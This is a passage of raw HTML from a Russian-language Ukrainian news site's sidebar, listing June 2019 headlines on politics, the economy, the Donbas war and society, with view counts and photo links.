традиционных авто - исследование" src="https://enovosty.com/wp-content/uploads/2019/06/maxresdefault-1.jpg"></a><a href="https://enovosty.com/news-auto/full/506-investory-delayut-stavku-na-elektromobili-vmesto-tradicionnyx-avto-issledovanie" title="Инвесторы делают ставку на электромобили вместо традиционных авто - исследование" class="name">Инвесторы делают ставку на электромобили вместо традиционных авто - исследование <span>(433)</span></a></li></ul></li><li><ul class="tact"><li id="li3" style="width:210px;"><a href="https://enovosty.com/news-finance/full/506-gosbyudzhet-ukrainy-vypolnen-s-proficitom-86-mlrd-grn" title="Госбюджет Украины выполнен с профицитом 8,6 млрд грн"><img width="210" height="156" alt="Госбюджет Украины выполнен с профицитом 8,6 млрд грн" src="https://enovosty.com/wp-content/uploads/2019/06/662763-0.jpg"></a><a href="https://enovosty.com/news-finance/full/506-gosbyudzhet-ukrainy-vypolnen-s-proficitom-86-mlrd-grn" title="Госбюджет Украины выполнен с профицитом 8,6 млрд грн" class="name">Госбюджет Украины выполнен с профицитом 8,6 млрд грн <span>(198)</span></a></li></ul></li><li><ul class="tact"><li id="li4" style="width:210px;"><a href="https://enovosty.com/news-markets/full/506-v-ukraine-povysyatsya-ceny-na-sigarety" title="В Украине повысятся цены на сигареты из-за увеличения акциза"><img width="210" height="156" alt="В Украине повысятся цены на сигареты из-за увеличения акциза" src="https://enovosty.com/wp-content/uploads/2019/06/aktsiz_tabak_skolko_stoit_0.jpg"></a><a href="https://enovosty.com/news-markets/full/506-v-ukraine-povysyatsya-ceny-na-sigarety" title="В Украине повысятся цены на сигареты из-за увеличения акциза" class="name">В Украине повысятся цены на сигареты из-за увеличения акциза <span>(176)</span></a></li></ul></li><li><ul class="tact"><li id="li5" style="width:210px;"><a href="https://enovosty.com/news_abroad/full/506-kitajskij-bankopad-ekonomika-knr-na-grani-krizisa" title="Китайский банкопад: Экономика КНР на грани кризиса"><img width="210" height="156" alt="Китайский банкопад: Экономика КНР на грани кризиса" src="https://enovosty.com/wp-content/uploads/2019/06/1445881209_agrevkumieq.jpg"></a><a href="https://enovosty.com/news_abroad/full/506-kitajskij-bankopad-ekonomika-knr-na-grani-krizisa" title="Китайский банкопад: Экономика КНР на грани кризиса" class="name">"Китайский банкопад": Экономика КНР на грани кризиса <span>(2587)</span></a></li></ul></li><li><ul class="tact"><li id="li6" style="width:210px;"><a href="https://enovosty.com/news-markets/full/506-kabmin-trebuet-ot-naftogaza-snizit-cenu-na-gaz" title="Кабмин требует от Нафтогаза снизить цену на газ для населения"><img width="210" height="156" alt="Кабмин требует от Нафтогаза снизить цену на газ для населения" src="https://enovosty.com/wp-content/uploads/2019/06/unian_175655_2_771x517.jpg"></a><a href="https://enovosty.com/news-markets/full/506-kabmin-trebuet-ot-naftogaza-snizit-cenu-na-gaz" title="Кабмин требует от Нафтогаза снизить цену на газ для населения" class="name">Кабмин требует от Нафтогаза снизить цену на газ для населения <span>(641)</span></a></li></ul></li><li><ul class="tact"><li id="li7" style="width:210px;"><a href="https://enovosty.com/news_economy/full/506-vracham-rasskazali-u-kogo-trebovat-povysheniya-zarplaty" title="Врачам рассказали, у кого требовать повышения зарплаты"><img width="210" height="156" alt="Врачам рассказали, у кого требовать повышения зарплаты" src="https://enovosty.com/wp-content/uploads/2019/06/suprun.jpg"></a><a href="https://enovosty.com/news_economy/full/506-vracham-rasskazali-u-kogo-trebovat-povysheniya-zarplaty" title="Врачам рассказали, у кого требовать повышения зарплаты" class="name">Врачам рассказали, у кого требовать повышения зарплаты <span>(578)</span></a></li></ul></li><li><ul class="tact"><li id="li8" style="width:210px;"><a href="https://enovosty.com/politika-video/full/506-ukrainskie-katera-tipa-island-proshli-pervye-ispytaniya-v-ssha-video" title="Украинские катера типа Island прошли первые испытания в США (ВИДЕО)"><img width="210" height="156" alt="Украинские катера типа Island прошли первые испытания в США (ВИДЕО)" src="https://enovosty.com/wp-content/uploads/2019/06/maxresdefault-e1559729515847.jpg"></a><a href="https://enovosty.com/politika-video/full/506-ukrainskie-katera-tipa-island-proshli-pervye-ispytaniya-v-ssha-video" title="Украинские катера типа Island прошли первые испытания в США (ВИДЕО)" class="name">Украинские катера типа "Island" прошли первые испытания в США (ВИДЕО) <span>(1780)</span></a></li></ul></li><li><ul class="tact"><li id="li9" style="width:210px;"><a href="https://enovosty.com/news_economy/full/506-kogda-tv-v-ukraine-stanet-polnostyu-platnym" title="Когда ТВ в Украине станет полностью платным"><img width="210" height="156" alt="Когда ТВ в Украине станет полностью платным" src="https://enovosty.com/wp-content/uploads/2019/06/tv2.jpg"></a><a href="https://enovosty.com/news_economy/full/506-kogda-tv-v-ukraine-stanet-polnostyu-platnym" title="Когда ТВ в Украине станет полностью платным" class="name">Когда ТВ в Украине станет полностью платным <span>(3545)</span></a></li></ul></li><li><ul class="tact"><li id="li10" style="width:210px;"><a href="https://enovosty.com/news_economy/full/506-ukraina-nachala-xorosho-zarabatyvat-na-seriale-chernobyl" title="Украина начала хорошо зарабатывать на сериале «Чернобыль»"><img width="210" height="156" alt="Украина начала хорошо зарабатывать на сериале «Чернобыль»" src="https://enovosty.com/wp-content/uploads/2019/06/chernobil.jpg"></a><a href="https://enovosty.com/news_economy/full/506-ukraina-nachala-xorosho-zarabatyvat-na-seriale-chernobyl" title="Украина начала хорошо зарабатывать на сериале «Чернобыль»" class="name">Украина начала хорошо зарабатывать на сериале «Чернобыль» <span>(480)</span></a></li></ul></li><li><ul class="tact"><li id="li11" style="width:210px;"><a href="https://enovosty.com/news_economy/full/506-ekspert-obyasnil-rezkoe-podorozhanie-populyarnyx-produktov" title="Эксперт объяснил резкое подорожание популярных продуктов"><img width="210" height="156" alt="Эксперт объяснил резкое подорожание популярных продуктов" src="https://enovosty.com/wp-content/uploads/2019/06/ovoschi.jpg"></a><a href="https://enovosty.com/news_economy/full/506-ekspert-obyasnil-rezkoe-podorozhanie-populyarnyx-produktov" title="Эксперт объяснил резкое подорожание популярных продуктов" class="name">Эксперт объяснил резкое подорожание популярных продуктов <span>(308)</span></a></li></ul></li><li><ul class="tact"><li id="li12" style="width:210px;"><a href="https://enovosty.com/news_politics/full/506-vojna-na-donbasse-vsu-ponesli-bolshie-poteri" title="Война на Донбассе: ВСУ понесли большие потери"><img width="210" height="156" alt="Война на Донбассе: ВСУ понесли большие потери" src="https://enovosty.com/wp-content/uploads/2019/06/voyna.jpg"></a><a href="https://enovosty.com/news_politics/full/506-vojna-na-donbasse-vsu-ponesli-bolshie-poteri" title="Война на Донбассе: ВСУ понесли большие потери" class="name">Война на Донбассе: ВСУ понесли большие потери <span>(1133)</span></a></li></ul></li><li><ul class="tact"><li id="li13" style="width:210px;"><a href="https://enovosty.com/news-auto/full/406-v-ukraine-budut-proizvodit-elektroavtobusy-dlya-evropy" title="В Украине будут производить электроавтобусы для Европы"><img width="210" height="156" alt="В Украине будут производить электроавтобусы для Европы" src="https://enovosty.com/wp-content/uploads/2019/06/20171013103205-e1559659534995.jpg"></a><a href="https://enovosty.com/news-auto/full/406-v-ukraine-budut-proizvodit-elektroavtobusy-dlya-evropy" title="В Украине будут производить электроавтобусы для Европы" class="name">В Украине будут производить электроавтобусы для Европы <span>(2448)</span></a></li></ul></li><li><ul class="tact"><li id="li14" style="width:210px;"><a href="https://enovosty.com/news_society/full/406-rada-uvelichila-shtraf-za-otkaz-vezti-lgotnikov-v-20-raz" title="Рада увеличила штраф за отказ везти льготников в 20 раз"><img width="210" height="156" alt="Рада увеличила штраф за отказ везти льготников в 20 раз" src="https://enovosty.com/wp-content/uploads/2019/06/sdokhni-voditel-lgotniku-v-sevastopolskoy-marshrutke_foto-iz-arkhiva-gazety-kafa_1_2018-12-13-15-33-13.jpeg"></a><a href="https://enovosty.com/news_society/full/406-rada-uvelichila-shtraf-za-otkaz-vezti-lgotnikov-v-20-raz" title="Рада увеличила штраф за отказ везти льготников в 20 раз" class="name">Рада увеличила штраф за отказ везти льготников в 20 раз <span>(327)</span></a></li></ul></li></ul></div><div class="wiget simple_pr"><div class="caption"><p style=" text-transform: uppercase; font-weight: 700; font-family: arial,verdana,tahoma; margin: 0; display: block; float: left; color: #fff; padding: 0 5px 0 4px; background-color: #f93; height: 17px; font-size: 12px;
"><a style="color: #fff;" href="https://enovosty.com/photo-nedeli">Фото недели</a></p></div><div class="blogTitle"><p style="font-size:8pt;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=458&pid=10337" rel="bookmark">Исторические фотографии в цвете</a></p><div style="text-align:center;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=458&pid=10337" rel="bookmark"> <img alt="Фото недели" src="https://enovosty.com/wp-content/gallery/foto_tsvet/thumbs/thumbs_02.jpg"></a></div></div> <div class="cls"></div> <a href="https://enovosty.com/photo-nedeli" class="readMore">Все фото &raquo;</a></div><div class="wiget simple_line" style="border-color:#D6E5F2;"><div class="caption" style=""><p style="font-size: 12px; height: 17px; color: #fff; background-color: #346796; padding: 0 5px; display: inline; text-transform: uppercase; font-weight: 700;font-family: arial,verdana,tahoma;">Новости общества</p></div><div class='cls'></div><span class='news_date'>05.06.2019 г.</span><br /><div class="post_news"><span id="post-4759202"><span class="postDate">22:00</span><a class="postTitle" href="https://enovosty.com/news_society/full/506-chelovechestvo-mozhet-ischeznut-k-2050-godu-uchenye">Человечество может исчезнуть к 2050 году - ученые</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4759225"><span class="postDate">19:36</span><a class="postTitle" href="https://enovosty.com/news_society/full/506-v-nemeckom-cirke-vmesto-zhivotnyx-vystupayut-gologrammy-video">В немецком цирке вместо животных выступают голограммы (ВИДЕО)</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4759230"><span class="postDate">19:11</span><a class="postTitle" href="https://enovosty.com/news_society/full/506-bolee-poloviny-ukraincev-podderzhivaet-novuyu-pravoslavnuyu-cerkov-ukrainy-epifanij">Более половины украинцев поддерживает новую Православную церковь Украины, - Епифаний</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4759235"><span class="postDate">17:57</span><a class="postTitle" href="https://enovosty.com/news_society/full/506-suprun-gotovit-tranzitnuyu-knigu-dlya-novoj-komandy-minzdrava">Супрун готовит "транзитную книгу" для новой команды Минздрава</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4759195"><span class="postDate">17:11</span><a class="postTitle" href="https://enovosty.com/news_society/full/506-policiya-budet-proveryat-vse-fakty-nedostojnogo-povedeniya-sotrudnikov-vne-sluzhby-knyazev">Полиция будет проверять все факты недостойного поведения сотрудников вне службы, - Князев</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4759178"><span class="postDate">15:07</span><a class="postTitle" href="https://enovosty.com/news_society/full/506-mnogo-ili-malo-120-pkr-neptun-chtoby-otpravit-na-dno-chf-vmf-rf-zloj-odessit">Много или мало 120 ПКР "Нептун", чтобы отправить на дно ЧФ ВМФ РФ, - Злой Одессит</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4759175"><span class="postDate">14:31</span><a class="postTitle" href="https://enovosty.com/news_society/full/506-mezhdunarodnyj-aeroport-borispol-mozhet-prekratit-rabotu-cherez-dve-nedeli">Международный аэропорт "Борисполь" может прекратить работу через две недели</a><br /><div class="postFields"></div></span></div><div class="cls"></div><a class="readMore" href="https://enovosty.com/news/news_society">Все новости общества</a></div><div class="wiget simple_line analitika"> <div class="caption"><p style="text-transform: uppercase;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;"><a href="https://enovosty.com/articles">Аналитика</a></p></div><div class="block"><div class="info"><span class="postDate">05.06.2019</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/politika/full/506-itogi-dnya-novyj-udar-po-rossii-referendumy-zelenskogo-i-tragediya-na-donbasse">Итоги дня: Новый удар по России, референдумы Зеленского и трагедия на Донбассе</a></p><div class="cblock"><a href="https://enovosty.com/politika/full/506-itogi-dnya-novyj-udar-po-rossii-referendumy-zelenskogo-i-tragediya-na-donbasse"><img width="230" alt="Итоги дня: Новый удар по России, референдумы Зеленского и трагедия на Донбассе" src="/wp-content/uploads/2019/06/sancii-e1559753120801.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/politika/full/506-itogi-dnya-novyj-udar-po-rossii-referendumy-zelenskogo-i-tragediya-na-donbasse">Сутки на Донбассе оказались трагическими для украинцев, в Европе одобрили продление антироссийских санкций, а в Минске готовят новое перемирие, - такими ...</a></span></div><div class="block"><div class="info"><span class="postDate">05.06.2019</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/ekonomika/full/506-skazka-lozh-da-v-nej-namek-est-li-ugroza-defolta-v-ukraine">Сказка - ложь, да в ней намек: есть ли угроза дефолта в Украине?</a></p><div class="cblock"><a href="https://enovosty.com/ekonomika/full/506-skazka-lozh-da-v-nej-namek-est-li-ugroza-defolta-v-ukraine"><img width="230" alt="Сказка - ложь, да в ней намек: есть ли угроза дефолта в Украине?" src="/wp-content/uploads/2019/06/defolt2.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/ekonomika/full/506-skazka-lozh-da-v-nej-namek-est-li-ugroza-defolta-v-ukraine">Украина может претендовать на подписание новой программы сотрудничества с Международным валютным фондом (МВФ) не ранее окончания избирательного процесса, ...</a></span></div><div class="block"><div class="info"><span class="postDate">05.06.2019</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/finance/full/506-vladimir-stelmax-ekonomika-nuzhdaetsya-v-antiimportnoj-industrializacii-i-snizhenii-kreditnyx-stavok">Владимир Стельмах: Экономика нуждается в антиимпортной индустриализации и снижении кредитных ставок</a></p><div class="cblock"><a href="https://enovosty.com/finance/full/506-vladimir-stelmax-ekonomika-nuzhdaetsya-v-antiimportnoj-industrializacii-i-snizhenii-kreditnyx-stavok"><img width="230" alt="Владимир Стельмах: Экономика нуждается в антиимпортной индустриализации и снижении кредитных ставок" src="/wp-content/uploads/2019/06/volodimir-stelmah-1.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/finance/full/506-vladimir-stelmax-ekonomika-nuzhdaetsya-v-antiimportnoj-industrializacii-i-snizhenii-kreditnyx-stavok">Владимир Стельмах - банкир с многолетним опытом - руководил Национальным банком Украины дважды: в 2000-2002 гг. и в 2004-2010 гг. За время работы в НБУ ...</a></span></div></div><div class="wiget simple_line" style="border-color:#D6E5F2;"><div class="caption"><p style="font-weight: 700; font-family: arial,verdana,tahoma; font-size: 12px; text-transform: uppercase; margin: 0; padding: 0; text-align: left;height: 17px;"><a href="https://enovosty.com/news/">Последние новости</a></p></div><div class='cls'></div><span class='news_date'>05.06.2019 г.</span><br /><div class="post_news"> <span id="post-4759215"> <span class="postDate">22:30</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/506-populyarnyj-napitok-okazalsya-smertelno-opasnym">Популярный напиток оказался смертельно опасным</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759202"> <span class="postDate">22:00</span> <a class="postTitle" href="https://enovosty.com/news_society/full/506-chelovechestvo-mozhet-ischeznut-k-2050-godu-uchenye">Человечество может исчезнуть к 2050 году - ученые</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759199"> <span class="postDate">21:20</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/506-v-ukrainu-budut-postavlyat-nedorogie-avto-iz-korei">В Украину будут поставлять недорогие авто из Кореи</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759245"> <span class="postDate">20:58</span> <a class="postTitle" href="https://enovosty.com/news_incidents/full/506-v-policii-rasskazali-shokiruyushhie-podrobnosti-smertelnogo-raneniya-5-letnego-kirilla-tulyaeva">В полиции рассказали шокирующие подробности смертельного ранения 5-летнего Кирилла Тлявова</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759243"> <span class="postDate">20:18</span> <a class="postTitle" href="https://enovosty.com/news-markets/full/506-viktor-skarshevskij-rasskazal-o-vliyanii-snizheniya-ceny-na-gaz-na-byudzhet-domoxozyajstv">Виктор Скаршевский рассказал о влиянии снижения цены на газ на бюджет домохозяйств</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759194"> <span class="postDate">20:00</span> <a class="postTitle" href="https://enovosty.com/news_kiev/full/506-uzhe-cherez-cherez-polgoda-zhetonov-v-stolichnom-metro-ne-budet">Уже через полгода жетонов в столичном метро не будет</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759225"> <span class="postDate">19:36</span> <a class="postTitle" href="https://enovosty.com/news_society/full/506-v-nemeckom-cirke-vmesto-zhivotnyx-vystupayut-gologrammy-video">В немецком цирке вместо животных выступают голограммы (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759192"> <span class="postDate">19:30</span> <a class="postTitle" href="https://enovosty.com/news_kiev/full/506-v-kievskom-metro-kursiruet-neobychnyj-poezd-foto">В киевском метро курсирует необычный поезд (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759230"> <span class="postDate">19:11</span> <a class="postTitle" href="https://enovosty.com/news_society/full/506-bolee-poloviny-ukraincev-podderzhivaet-novuyu-pravoslavnuyu-cerkov-ukrainy-epifanij">Более половины украинцев поддерживает новую Православную церковь Украины, - Епифаний</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759228"> <span class="postDate">18:55</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/506-investory-delayut-stavku-na-elektromobili-vmesto-tradicionnyx-avto-issledovanie">Инвесторы делают ставку на электромобили вместо традиционных авто - исследование</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759224"> <span class="postDate">18:48</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/506-associated-press-zelenskij-prizyvaet-uzhestochit-sankcii-protiv-rossii">Associated Press: Зеленский призывает ужесточить санкции против России</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759216"> <span class="postDate">18:41</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/506-xolodnickij-vstupaet-v-delo-o-xishhenii-127-mlrd-na-cherkassyoblenergo">Холодницкий вступает в дело о хищении 1,27 млрд на «Черкассыоблэнерго»</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759218"> <span class="postDate">18:30</span> <a class="postTitle" href="https://enovosty.com/news-markets/full/506-v-energoatome-podvergli-kritike-zayavleniya-ukrenergo-o-negotovnosti-rynka-elektroenergii">В Энергоатоме подвергли критике заявления "Укрэнерго" о неготовности рынка электроэнергии</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759212"> <span class="postDate">18:19</span> <a class="postTitle" href="https://enovosty.com/news_incidents/full/506-policiya-obezvredila-serijnogo-rasxititelya-xramov">Полиция обезвредила серийного расхитителя храмов</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759204"> <span class="postDate">18:09</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/506-apellyacionnyj-sud-otkryl-put-k-sanacii-centrenergo">Апелляционный суд открыл путь к санации «Центрэнерго»</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759235"> <span class="postDate">17:57</span> <a class="postTitle" href="https://enovosty.com/news_society/full/506-suprun-gotovit-tranzitnuyu-knigu-dlya-novoj-komandy-minzdrava">Супрун готовит "транзитную книгу" для новой команды Минздрава</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759203"> <span class="postDate">17:38</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/506-ssha-prodolzhayut-trebovat-ot-severnoj-korei-polnoj-denuklearizacii-pompeo">США продолжают требовать от Северной Кореи полной денуклеаризации, - Помпео</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759195"> <span class="postDate">17:11</span> <a class="postTitle" href="https://enovosty.com/news_society/full/506-policiya-budet-proveryat-vse-fakty-nedostojnogo-povedeniya-sotrudnikov-vne-sluzhby-knyazev">Полиция будет проверять все факты недостойного поведения сотрудников вне службы, - Князев</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759190"> <span class="postDate">16:56</span> <a class="postTitle" href="https://enovosty.com/news-finance/full/506-gosbyudzhet-ukrainy-vypolnen-s-proficitom-86-mlrd-grn">Госбюджет Украины выполнен с профицитом 8,6 млрд грн</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759188"> <span class="postDate">16:32</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/506-ukraina-v-es-eto-smert-rossijskogo-imperskogo-proekta-zelenskij">Украина в ЕС - это смерть российского имперского проекта, - Зеленский</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759186"> <span class="postDate">16:13</span> <a class="postTitle" href="https://enovosty.com/news-markets/full/506-v-ukraine-povysyatsya-ceny-na-sigarety">В Украине повысятся цены на сигареты из-за увеличения акциза</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759184"> <span class="postDate">15:52</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/506-kitajskij-bankopad-ekonomika-knr-na-grani-krizisa">"Китайский банкопад": Экономика КНР на грани кризиса</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759180"> <span class="postDate">15:33</span> <a class="postTitle" href="https://enovosty.com/news-markets/full/506-kabmin-trebuet-ot-naftogaza-snizit-cenu-na-gaz">Кабмин требует от Нафтогаза снизить цену на газ для населения</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759178"> <span class="postDate">15:07</span> <a class="postTitle" href="https://enovosty.com/news_society/full/506-mnogo-ili-malo-120-pkr-neptun-chtoby-otpravit-na-dno-chf-vmf-rf-zloj-odessit">Много или мало 120 ПКР "Нептун", чтобы отправить на дно ЧФ ВМФ РФ, - Злой Одессит</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759141"> <span class="postDate">15:00</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/506-u-rossii-poyavilos-oruzhie-sposobnoe-unichtozhat-podvodnye-lodki-protivnika-pryamo-s-orbity">У России появилось оружие, способное уничтожать подводные лодки противника прямо с орбиты</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759175"> <span class="postDate">14:31</span> <a class="postTitle" href="https://enovosty.com/news_society/full/506-mezhdunarodnyj-aeroport-borispol-mozhet-prekratit-rabotu-cherez-dve-nedeli">Международный аэропорт "Борисполь" может прекратить работу через две недели</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759174"> <span class="postDate">14:27</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/506-sostavlen-spisok-samyx-populyarnyx-avtomobilej-v-ukraine">Составлен список самых популярных автомобилей в Украине</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759169"> <span class="postDate">14:16</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/506-vrachi-byut-trevogu-v-ukraine-zafiksirovany-sluchai-zabolevaniya-botulizmom">Врачи бьют тревогу: В Украине зафиксированы случаи заболевания ботулизмом</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759165"> <span class="postDate">14:06</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/506-v-nbu-nachali-vypuskat-analog-bitkoina-e-grivnyu-chto-izvestno-o-novoj-valyute">В НБУ начали выпускать аналог биткоина - е-гривню: что известно о новой валюте</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759164"> <span class="postDate">13:58</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/506-stalo-izvestno-kogda-v-britanii-vyberut-novogo-premera">Стало известно, когда в Британии выберут нового премьера</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759161"> <span class="postDate">13:54</span> <a class="postTitle" href="https://enovosty.com/news_society/full/506-opublikovan-rejting-luchshix-ukrainskix-vuzov-dlya-izucheniya-it">Опубликован рейтинг лучших украинских ВУЗов для изучения IT</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759159"> <span class="postDate">13:49</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/506-kopaniya-samsung-nachala-rabotu-nad-mobilnoj-svyazyu-6g">Копания Samsung начала работу над мобильной связью 6G</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759158"> <span class="postDate">13:27</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/506-vracham-rasskazali-u-kogo-trebovat-povysheniya-zarplaty">Врачам рассказали, у кого требовать повышения зарплаты</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759152"> <span class="postDate">13:22</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/506-prekrasno-otstrelyalis-v-motor-sich-ozvuchili-gosszakaz-na-rakety-neptun">Прекрасно отстрелялись: В «Мотор Сич» озвучили госсзаказ на ракеты «Нептун»</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759143"> <span class="postDate">13:07</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/506-donald-tramp-zadremal-vo-vremya-rechi-korolevy-elizavety-ii-video">Дональд Трамп задремал во время речи королевы Елизаветы II (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759140"> <span class="postDate">12:47</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/506-zelenskij-xochet-provesti-referendum">Зеленский хочет провести референдум</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759136"> <span class="postDate">12:45</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/506-tramp-nazval-iran-terroristicheskoj-stranoj-nomer-odin-v-mire">Трамп назвал Иран «террористической страной номер один в мире»</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759133"> <span class="postDate">12:42</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/506-debatov-ne-budet-evrosoyuz-udarit-po-rossii-novymi-sankciyami">Дебатов не будет: Евросоюз ударит по России новыми санкциями</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759132"> <span class="postDate">12:41</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/506-diabet-i-ostanovka-serdca-mediki-nazvali-glavnye-opasnosti-upotrebleniya-energeticheskix-napitkov">Диабет и остановка сердца: Медики назвали главные опасности употребления энергетических напитков</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759130"> <span class="postDate">12:23</span> <a class="postTitle" href="https://enovosty.com/news-finance/full/506-devalvaciya-uskorilas-dollar-v-ukraine-probil-psixologicheskoe-dno">Девальвация ускорилась: Доллар в Украине пробил психологическое дно</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759129"> <span class="postDate">12:21</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/506-pochemu-smartfony-huawei-tak-populyarny-vo-vsem-mire-krome-ssha">Почему смартфоны Huawei так популярны во всем мире, кроме США</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759125"> <span class="postDate">12:17</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/506-bolee-chetverti-benzina-prodavaemogo-v-kolumbii-ispolzuetsya-dlya-proizvodstva-kokaina">Более четверти бензина, продаваемого в Колумбии, используется для производства кокаина</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759124"> <span class="postDate">12:02</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/506-kogda-tv-v-ukraine-stanet-polnostyu-platnym">Когда ТВ в Украине станет полностью платным</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759123"> <span class="postDate">11:44</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/506-predstaviteli-biznesa-rasskazali-ob-effekte-reformy-ekonaloga">Представители бизнеса рассказали об эффекте реформы эконалога</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759122"> <span class="postDate">11:42</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/506-ukraina-nachala-xorosho-zarabatyvat-na-seriale-chernobyl">Украина начала хорошо зарабатывать на сериале «Чернобыль»</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759120"> <span class="postDate">11:17</span> <a class="postTitle" href="https://enovosty.com/news-markets/full/506-eksport-ukrainskoj-muki-prodolzhaet-snizhatsya">Экспорт украинской муки продолжает снижаться</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759115"> <span class="postDate">11:03</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/506-vse-ploxo-rossijskie-denezhnye-meshki-zagovorili-anti-colorados">"Все плохо": российские денежные мешки заговорили, - Аnti-colorados</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759114"> <span class="postDate">11:01</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/506-ubijstvo-rebenka-pod-kievom-zhena-policejskogo-porazila-cinichnym-zayavleniem">Убийство ребенка под Киевом: жена полицейского поразила циничным заявлением</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759112"> <span class="postDate">10:44</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/506-stroitelstvo-v-ukraine-rezko-dorozhaet">Строительство в Украине резко дорожает</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4759108"> <span class="postDate">10:41</span> <a class="postTitle" 